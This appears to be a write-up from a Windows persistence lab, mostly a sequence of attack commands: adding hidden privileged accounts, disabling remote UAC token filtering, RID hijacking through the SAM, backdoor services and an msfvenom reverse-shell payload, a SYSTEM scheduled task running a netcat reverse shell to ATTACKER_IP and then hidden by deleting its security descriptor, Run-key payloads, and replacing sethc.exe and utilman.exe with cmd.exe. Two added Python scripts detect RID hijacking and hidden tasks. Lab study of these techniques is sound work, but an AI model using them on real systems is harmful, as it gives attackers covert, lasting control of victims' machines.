Windows Local Persistence

Windows Local Persistence is a technique used by attackers to maintain access to a system after they have compromised it.

Creating an Administrator Account

net localgroup administrators thmuser0 /add

Adding a user straight to the Administrators group might look suspicious, so you can create a "Backup Operators" account instead. This group has the ability to read the SAM and SECURITY files, which can be used to escalate privileges.

net localgroup "Backup Operators" thmuser1 /add
net localgroup "Remote Management Users" thmuser1 /add

evil-winrm -i 10.10.194.124 -u thmuser1 -p Password321

By default, a local account in a privileged group receives a filtered (UAC-restricted) token when it logs on remotely, so thmuser1's Backup Operators privileges would not be usable over WinRM. Setting LocalAccountTokenFilterPolicy to 1 disables that remote token filtering:

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1

RID Hijacking

Another method to gain administrative privileges without being an administrator is changing some registry values to make the operating system think you are the Administrator.

When a user is created, an identifier called the Relative ID (RID) is assigned to them. The RID is simply a numeric identifier representing the user across the system. When a user logs on, the LSASS process gets their RID from the SAM registry hive and creates an access token associated with that RID. If we can tamper with the registry value, we can make Windows assign an Administrator access token to an unprivileged user by associating the same RID with both accounts.

In any Windows system, the default Administrator account is assigned the RID = 500, and regular users usually have RID >= 1000.

To find the assigned RIDs for any user, you can use the following command:

C:\> wmic useraccount get name,sid

Name                SID
Administrator       S-1-5-21-1966530601-3185510712-10604624-500
DefaultAccount      S-1-5-21-1966530601-3185510712-10604624-503
Guest               S-1-5-21-1966530601-3185510712-10604624-501
thmuser1            S-1-5-21-1966530601-3185510712-10604624-1008
thmuser2            S-1-5-21-1966530601-3185510712-10604624-1009
thmuser3            S-1-5-21-1966530601-3185510712-10604624-1010

The RID is the last component of the SID (1010 for thmuser3 and 500 for Administrator). The SID is an identifier that allows the operating system to identify a user across a domain, but we don't need to worry about the rest of it for this task.

Now we only have to assign RID=500 to thmuser3. To do so, we need to access the SAM using Regedit. The SAM is restricted to the SYSTEM account only, so even the Administrator won't be able to edit it. To run Regedit as SYSTEM, we will use psexec, available in C:\tools\pstools on your machine:

C:\tools\pstools> PsExec64.exe -i -s regedit

From Regedit, we will go to HKLM\SAM\SAM\Domains\Account\Users, where there will be a key for each user on the machine. Since we want to modify thmuser3, we need to search for a key named with its RID in hex (1010 = 0x3F2). Under the corresponding key, there will be a value called F, which holds the user's effective RID at offset 0x30.

Notice the RID is stored using little-endian notation, so its bytes appear reversed (F2 03 for 0x3F2).

We will now replace those two bytes with the RID of Administrator in hex (500 = 0x01F4), switching the bytes around (F4 01).

The next time thmuser3 logs in, LSASS will associate it with the same RID as Administrator and grant them the same privileges.
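As an added defender-side example (not part of the original write-up), the following script audits the SAM F values described above: it compares the RID encoded in each user key's name with the effective RID stored little-endian at offset 0x30 and flags any mismatch. The key name format (8 hex digits, e.g. 000003F2) and the sample F blobs are constructed here; on a live system the blobs would come from a SAM hive export.

```python
# Added example (not from the original write-up): audit SAM "F" values for
# RID hijacking. Under HKLM\SAM\SAM\Domains\Account\Users each user key is
# named after its real RID in hex (000003F2 for RID 1010) and the F value
# holds the effective RID, little-endian, at offset 0x30. When the two
# disagree, LSASS will build the account's token from the wrong RID.
import struct

RID_OFFSET = 0x30        # where the effective RID lives inside the F value
SAMPLE_F_LENGTH = 0x50   # length used for the constructed sample blobs below


def rid_from_key_name(key_name: str) -> int:
    """'000003F2' -> 1010: the key name is the account's real RID in hex."""
    return int(key_name, 16)


def encode_rid(rid: int) -> bytes:
    """Little-endian DWORD as stored in F (500 -> f4 01 00 00)."""
    return struct.pack("<I", rid)


def effective_rid(f_value: bytes) -> int:
    """Read the little-endian RID at offset 0x30 of an F value."""
    if len(f_value) < RID_OFFSET + 4:
        raise ValueError("F value too short to contain a RID")
    return struct.unpack_from("<I", f_value, RID_OFFSET)[0]


def audit_user(key_name: str, f_value: bytes) -> dict:
    """Flag an account whose effective RID differs from the RID in its key name."""
    expected = rid_from_key_name(key_name)
    actual = effective_rid(f_value)
    return {
        "key": key_name,
        "expected_rid": expected,
        "effective_rid": actual,
        "hijacked": expected != actual,
        # RID 500 is the built-in Administrator, the usual target of the hijack
        "impersonates_admin": actual == 500 and expected != 500,
    }


def make_f_value(rid: int) -> bytes:
    """Constructed F blob for testing: zeros except for the RID field."""
    buf = bytearray(SAMPLE_F_LENGTH)
    buf[RID_OFFSET:RID_OFFSET + 4] = encode_rid(rid)
    return bytes(buf)


if __name__ == "__main__":
    # thmuser3 (RID 1010) before and after its RID field is rewritten to 500
    print(audit_user("000003F2", make_f_value(1010)))
    print(audit_user("000003F2", make_f_value(500)))
```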

Creating Backdoor Services

We can create and start a service named "THMservice" using the following commands:

sc.exe create THMservice binPath= "net user Administrator Passwd123" start= auto
sc.exe start THMservice

Or create a service that runs a reverse shell:

user@AttackBox$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4448 -f exe-service -o rev-svc.exe

Then run the following commands on the target machine:

sc.exe create THMservice2 binPath= "C:\windows\rev-svc.exe" start= auto
sc.exe start THMservice2

Scheduled Tasks

C:\> schtasks /create /sc minute /mo 1 /tn THM-TaskBackdoor /tr "c:\tools\nc64 -e cmd.exe ATTACKER_IP 4444" /ru SYSTEM

The previous command will create a "THM-TaskBackdoor" task and execute an nc64 reverse shell back to the attacker. The /sc and /mo options indicate that the task should be run every single minute. The /ru option indicates that the task will run with SYSTEM privileges.

Check the task is running:

C:\> schtasks /query /tn thm-taskbackdoor

Making the Task Invisible

Deleting the task's SD value (its security descriptor) from the TaskCache Tree key hides it from schtasks /query and the Task Scheduler GUI for every user, including administrators, while the task keeps running. To make the task invisible, you can use the following command:

C:\> reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\THM-TaskBackdoor" /v SD /f
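As an added detection example (not part of the original write-up), the script below parses a saved `reg query ... /s` dump of the TaskCache Tree key and lists task nodes that have no SD value, which is exactly what the command above leaves behind. It assumes, as on real systems, that task nodes carry an Id value while folder nodes do not; the dump and its GUIDs are constructed.

```python
# Added example (not from the original write-up): spot tasks whose SD value
# has been deleted from the TaskCache Tree key, as the reg delete above does.
# It parses the text of
#   reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree" /s
# so a saved dump can be checked offline; the dump below is constructed.
import re

TREE = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree"

# Constructed sample: the backdoor task has lost its SD, a normal task still has one.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\THM-TaskBackdoor
    Id    REG_SZ    {11111111-2222-3333-4444-555555555555}
    Index    REG_DWORD    0x3

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\MicrosoftEdgeUpdateTaskMachineCore
    Id    REG_SZ    {66666666-7777-8888-9999-000000000000}
    Index    REG_DWORD    0x2
    SD    REG_BINARY    010004800000000000000000
"""


def parse_reg_query(text: str) -> dict:
    """Map each key (relative to Tree) to its values: name -> (type, data)."""
    keys, current = {}, None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            current = line[len(TREE):].lstrip("\\") if line.startswith(TREE) else line
            keys[current] = {}
        elif line.strip() and current is not None:
            # reg query separates name, type and data with runs of spaces
            fields = re.split(r"\s{2,}", line.strip(), maxsplit=2)
            if len(fields) >= 2:
                keys[current][fields[0]] = (fields[1], fields[2] if len(fields) > 2 else "")
    return keys


def hidden_tasks(keys: dict) -> list:
    """Task nodes carry an Id value; a task node with no SD value has been hidden."""
    return sorted(path for path, values in keys.items()
                  if "Id" in values and "SD" not in values)


if __name__ == "__main__":
    for task in hidden_tasks(parse_reg_query(SAMPLE_REG_QUERY)):
        print("task with no security descriptor:", task)
```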

Logon Triggered Persistence

Startup Folder

Each user has a folder under C:\Users\<your_username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup where you can put executables to be run whenever that user logs in. An attacker can achieve persistence just by dropping a payload in there. Note that each user only runs whatever is in their own folder.

If we want to force all users to run a payload while logging in, we can use the folder under C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp in the same way.

Run / RunOnce Registry Keys

The following registry keys run the programs listed under them at logon (HKCU keys for the current user only, HKLM keys for all users); RunOnce entries are removed after they run:

  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run
  • HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
  • HKLM\Software\Microsoft\Windows\CurrentVersion\Run
  • HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce

psexec -s -i reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "MyApp" /t REG_SZ /d "c:\windows\shell.exe" /f

Backdooring the Login Screen / RDP

C:\> takeown /f c:\Windows\System32\sethc.exe

SUCCESS: The file (or folder): "c:\Windows\System32\sethc.exe" now owned by user "PURECHAOS\Administrator".

C:\> icacls C:\Windows\System32\sethc.exe /grant Administrator:F
processed file: C:\Windows\System32\sethc.exe
Successfully processed 1 files; Failed processing 0 files

C:\> copy c:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
Overwrite C:\Windows\System32\sethc.exe? (Yes/No/All): yes
        1 file(s) copied.

Pressing Shift 5 times at the login screen launches sethc.exe (Sticky Keys), which now opens a command prompt with SYSTEM privileges.

Alternatively, you can replace utilman.exe (the Ease of Access binary) with cmd.exe to open a command prompt from the login screen.

C:\> takeown /f c:\Windows\System32\utilman.exe

SUCCESS: The file (or folder): "c:\Windows\System32\utilman.exe" now owned by user "PURECHAOS\Administrator".

C:\> icacls C:\Windows\System32\utilman.exe /grant Administrator:F
processed file: C:\Windows\System32\utilman.exe
Successfully processed 1 files; Failed processing 0 files

C:\> copy c:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe
Overwrite C:\Windows\System32\utilman.exe? (Yes/No/All): yes
        1 file(s) copied.